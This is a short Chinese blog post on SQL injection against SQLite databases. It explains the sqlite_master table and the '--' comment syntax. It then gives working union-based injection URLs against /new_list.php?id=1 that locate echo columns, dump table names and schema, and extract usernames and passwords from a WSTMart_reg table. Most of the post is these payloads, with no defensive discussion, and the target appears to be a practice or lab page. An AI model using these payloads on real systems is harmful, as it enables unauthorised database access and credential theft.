sqlite数据库注入

Posted 2021-03-11 single dog

sqlite数据库大部分在开发时使用，其注入语句也与其他数据库不同

1. sqlite数据库有一张sqlite_master表，里面有type/name/tbl_name/rootpage/sql记录着用户创建表时的相关信息
2. sqlite数据库的注释符是两个横杠“--”，空格会自动用加号表示
3. 测试回显位置， /new_list.php?id=1 union select 1,2,3,4
4. 开始爆这个表的字段值/new_list.php?id=1 and 1=2 union select 1,name,sql,4 from sqlite_master
5. 直接查/new_list.php?id=1 union select 1,name,password,4 from WSTMart_reg

附参考地址：https://blog.csdn.net/qq_39936434/article/details/94722615